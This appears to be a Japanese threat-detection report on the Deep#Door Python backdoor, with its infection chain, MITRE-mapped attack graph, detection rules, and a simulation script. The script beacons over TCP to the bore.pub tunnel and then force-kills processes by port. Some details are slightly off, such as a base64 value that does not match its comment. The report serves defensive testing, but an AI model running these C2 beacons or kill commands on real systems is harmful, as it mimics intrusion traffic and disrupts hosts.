フォローする 
Detection stack
- AIDR
- Alert
- ETL
- Query
概要
このレポートは、実行時に悪意のあるペイロードを埋め込み再構築する難読化されたバッチローダーを介して配信される、ステルス性のあるPythonベースのバックドアであるDeep#Doorを調査します。このマルウェアは、指揮・統制のために公共のTCPトンネリングサービスを利用し、いくつかの永続性機構を設定し、Windowsのセキュリティコントロールを弱体化させ、広範な監視および資格情報窃盗活動をサポートします。また、サンドボックスや分析者を回避するための詳細な環境チェックを実行し、実行中の隠蔽を維持するためにインメモリAPIパッチを使用します。
調査
Securonixの研究者たちは、初期バッチスクリプトからペイロードの抽出、再構築、最終的なPython RATの実行までの完全な感染チェーンをマッピングしました。彼らの分析により、 bore.pub がトンネリング、動的に生成されるポート、およびオペレーターアクセスに使用されるカスタム認証シーケンスの悪用が特定されました。レポートには、マルウェアの防御回避方法、永続性技術、システム発見ルーチン、およびデータ流出動作の詳細も記載されています。
緩和
防御者はスクリプトの実行を綿密に監視し、PowerShellログを有効にし、Microsoft Defenderやファイアウォール設定への無許可の変更を検出し、スタートアップ項目、Runキー、および関連する永続性の場所を監査するべきです。ネットワーク監視も、 bore.pub へのアウトバウンド接続と、異常な高ポートアクティビティに焦点を当てるべきです。APIパッチとインメモリ改ざんを検出する能力を持つEDRツールは、この脅威への可視性をさらに向上させることができます。
対応
Deep#Doorの活動が検出された場合、直ちに影響を受けたエンドポイントを隔離し、悪意のあるPythonプロセスを終了し、スタートアップスクリプト、Runキー、およびWMIサブスクリプションを含むすべての永続性機構を削除し、変更されたDefenderとログ設定を復元します。セキュリティチームはまた、メモリおよびフォレンジック分析を行って隠されたマルウェアを特定し、資格情報窃盗の露出を評価し、ネットワーク通信を bore.pub.
"graph TB %% Class Definitions Section classDef action fill:#99ccff classDef tool fill:#ffcc99 classDef malware fill:#ff9999 classDef process fill:#ccccff %% Nodes Definitions action_user_execution["<b>アクション</b> – <b>T1204 ユーザー実行</b>: 被害者は悪意のあるバッチファイルinstall_obf.batを実行する"] class action_user_execution action tool_batch_file["<b>ツール</b> – <b>名前</b>: install_obf.bat<br/><b>説明</b>: ローダーを起動するバッチスクリプト"] class tool_batch_file tool action_obfuscation["<b>アクション</b> – <b>T1027 隠されたファイルまたは情報</b>: ベース64/XORエンコードされたPythonペイロード(svc.py)を自己参照PowerShell正規表現を介して抽出する"] class action_obfuscation action tool_powershell["<b>ツール</b> – <b>名前</b>: PowerShell<br/><b>説明</b>: バッチファイルを解析し、埋め込まれたペイロードをデコードするために使用される"] class tool_powershell tool tool_python["<b>ツール</b> – <b>名前</b>: Python<br/><b>説明</b>: デコードされたsvc.pyペイロードを実行する"] class tool_python tool action_defense_evasion_disable["<b>アクション</b> – <b>T1562.001 ツールの無効化または修正</b> / <b>T1562.004 システムファイアウォールの無効化または修正</b> / <b>T1562.008 クラウドログの無効化または修正</b>: Windows Defender、PowerShellログ、SmartScreen、ファイアウォールログを無効化する"] class action_defense_evasion_disable action tool_setmp["<b>ツール</b> – <b>名前</b>: Set-MpPreference<br/><b>説明</b>: Defenderの設定を変更するためのPowershellコマンドレット"] class tool_setmp tool tool_netsh["<b>ツール</b> – <b>名前</b>: netsh advfirewall<br/><b>説明</b>: Windowsファイアウォールのルールとログを変更する"] class tool_netsh tool action_indicator_removal["<b>アクション</b> – <b>T1070.001 Windowsイベントログのクリア</b>と<b>T1070.006 Timestomp</b>: EventLog/Sysmonサービスを停止し、ファイルのタイムスタンプを変更する"] class action_indicator_removal action action_persistence_runkey["<b>アクション</b> – <b>T1547.001 レジストリRunキー/スタートアップフォルダ</b>と<b>T1053 スケジュールタスク/ジョブ</b>: StartupフォルダにSystemServices.vbsをドロップし、Runキーとフォールバックとしてスケジュールタスクを作成する"] class action_persistence_runkey action tool_vbs_startup["<b>ツール</b> – <b>名前</b>: SystemServices.vbs<br/><b>説明</b>: %APPDATA%MicrosoftWindowsStart MenuProgramsStartupに配置されるVBSスクリプト"] class tool_vbs_startup tool action_credential_access["<b>アクション</b> – <b>T1003 OSクレデンシャルダンプ</b>, <b>T1552.004 プライベートキー</b>, <b>T1552.001 ファイル内のクレデンシャル</b>, <b>T1555 パスワードストア</b>, <b>T1555.005 パスワードマネージャー</b>: ブラウザパスワード、Windows Credential Manager、SSHキー、クラウドトークンを収集する"] class action_credential_access action action_collection["<b>アクション</b> – <b>T1056.001 キーロギング</b>, <b>T1113 スクリーンキャプチャ</b>, <b>T1125 ビデオキャプチャ</b>, <b>T1123 オーディオキャプチャ</b>, <b>T1115 クリップボードデータ</b>: キーストローク、スクリーンショット、ウェブカメラビデオ、マイクオーディオおよびクリップボードをキャプチャする"] class action_collection action action_discovery["<b>アクション</b> – <b>T1082 システム情報の発見</b>, <b>T1518 ソフトウェアの発見</b>, <b>T1057 プロセスの発見</b>, <b>T1046 ネットワークサービスの発見</b>, <b>T1018 リモートシステムの発見</b>, <b>T1526 クラウドサービスの発見</b>: OS、ハードウェア、ソフトウェア、プロセス、ネットワークおよびクラウド構成データを収集する"] class action_discovery action action_defense_evasion_reflective["<b>アクション</b> – <b>T1620 リフレクティブコードロード</b>と<b>T1497.003 仮想化/サンドボックス回避: 時間ベース</b>: デバッガー、仮想マシンおよびサンドボックス特性を検出し、実行を中止する"] class action_defense_evasion_reflective action action_c2_tunneling["<b>アクション</b> – <b>T1572 プロトコルトンネリング</b>: 公共サービスbore.pubを介して暗号化トンネルを確立し、動的ポートスキャンを実行し、チャレンジ応答認証を行う"] class action_c2_tunneling action action_exfiltration["<b>アクション</b> – <b>T1041 C2チャンネル経由の流出</b>および<b>T1048.002 非C2非対称暗号プロトコル経由の流出</b>: 収集されたデータをトンネリングされたチャンネルを介して送信する"] class action_exfiltration action action_impact_forkbomb["<b>アクション</b> – <b>T1499.002 サービス消耗フラッディング</b>: フォーク爆弾を実行してシステムリソースを消耗する"] class action_impact_forkbomb action %% Connections showing attack flow action_user_execution –>|executes| tool_batch_file tool_batch_file –>|contains| action_obfuscation action_obfuscation –>|uses| tool_powershell tool_powershell –>|decodes and launches| tool_python tool_python –>|performs| action_defense_evasion_disable action_defense_evasion_disable –>|uses| tool_setmp action_defense_evasion_disable –>|uses| tool_netsh action_defense_evasion_disable –>|leads to| action_indicator_removal action_indicator_removal –>|precedes| action_persistence_runkey action_persistence_runkey –>|drops| tool_vbs_startup action_persistence_runkey –>|enables| action_credential_access action_credential_access –>|enables| action_collection action_collection –>|feeds data to| action_discovery action_discovery –>|supports| action_defense_evasion_reflective action_defense_evasion_reflective –>|establishes| action_c2_tunneling action_c2_tunneling –>|carries| action_exfiltration action_exfiltration –>|triggers| action_impact_forkbomb "
攻撃の流れ
検出
永続性の可能性のあるポイント [ASEPs – ソフトウェア/NTUSERハイブ](レジストリエベント経由)
見る
疑わしいPowershell文字列(コマンドライン経由)
見る
Powershellコマンドラインからの疑わしい.NETクラス/メソッドの呼び出し(プロセス作成経由)
見る
リモートシステム発見または接続性チェックの可能性(コマンドライン経由)
見る
アカウントまたはグループの列挙/操作の可能性(コマンドライン経由)
見る
遅延実行のためのタイムアウト使用の可能性(コマンドライン経由)
見る
LOLBAS WScript/CScript(プロセス作成経由)
見る
Windows Defenderのリアルタイムモニタリング無効化と他の設定変更(コマンドライン経由)
見る
疑わしいPowershell文字列(powershell経由)
見る
Windows Defender設定の疑わしい変更(powershell経由)
見る
自動起動位置にある疑わしいバイナリ/スクリプト(ファイルイベント経由)
見る
検出するためのIOC(HashSha256):Deep#Door Stealer:トンネリング、多層永続性、およびインメモリ監視機能を活用するステルス性Pythonバックドアと資格情報窃盗
見る
公共TCPトンネリングサービス経由のC2通信を検出する [Windowsネットワーク接続]
見る
埋め込まれたPythonペイロード抽出のためのPowerShellコマンド [Windows Powershell]
見る
Deep#Doorステルス性のあるPythonバックドア展開の検出 [Windowsプロセス作成]
見る
C2通信のためのBore.pub TCPトンネリングサービス使用の検出 [Windowsネットワーク接続]
見る
Windows Defenderリアルタイムおよび行動監視が無効 [Windows Powershell]
見る
Deep#Door難読化されたバッチスクリプトの実行 [Windowsプロセス作成]
見る
Windows Defender機能を無効化するためのPowerShellコマンド [Windows Powershell]
見る
Deep#Doorステルス性のあるPythonバックドア実行の検出 [Windowsプロセス作成]
見る
bore.pub経由のステルスC2通信の検出 [Windowsネットワーク接続]
見る
Powershellとファイアウォールの改ざんを使用したDeep#Door Stealerの検出 [Windows Powershell]
見る
シミュレーションの実行
前提条件:テレメトリーとベースラインプリフライトチェックが合格する必要があります。
根拠:このセクションは、検出ルールをトリガーするために設計された攻撃者手法(TTP)の正確な実行を詳述します。コマンドと説明は、特定されたTTPを反映し、検出ロジックに期待される正確なテレメトリーを生成することを目的としなければなりません。
-
攻撃のストーリー&コマンド:
Windowsホスト上で低権限の足がかりを得た攻撃者は、公開されている
bore.pubDeep#Doorで利用されるトンネリングサービスを使用して、ステルス性のあるC2チャネルを確立しようとします。正当化されたトラフィックと溶かし込むために、攻撃者は41,234‑41,243レンジから(マルウェアによって選択された)ポートを選び、PowerShellのSystem.Net.Sockets.TcpClientクラスを使って生のTCP接続を開きます。この接続は、心拍の模倣のために短時間アイドル状態に置かれ、次いで小さなベース64エンコードのビーコンを送信します。 -
回帰テストスクリプト:
# 監視される範囲内のランダムポートでbore.pubへのDeep#Door C2ビーコンをシミュレートする $domain = 'bore.pub' $port = Get-Random -Minimum 41234 -Maximum 41244 # 上限は排他 try { Write-Host "$domain:$port への接続..." $client = New-Object System.Net.Sockets.TcpClient $client.Connect($domain, $port) $stream = $client.GetStream() # 最小のビーコンペイロード(例:ベース64エンコードされた"ping") $payload = [System.Text.Encoding]::ASCII.GetBytes('cGlja2V0') $stream.Write($payload,0,$payload.Length) Write-Host "ビーコンを送信。接続を5秒間保持..." Start-Sleep -Seconds 5 } catch { Write-Error "接続失敗: $_" } finally { if ($stream) { $stream.Close() } if ($client) { $client.Close() } Write-Host "接続終了。" } -
クリーンアップコマンド:
# 永続的なアーティファクトはなし;残留TCP接続を確保しないこと Get-NetTCPConnection -RemotePort 41234-41243 -State Established | ForEach-Object { Stop-Process -Id $_.OwningProcess -Force } Write-Host "クリーンアップ完了。"
レポートの終了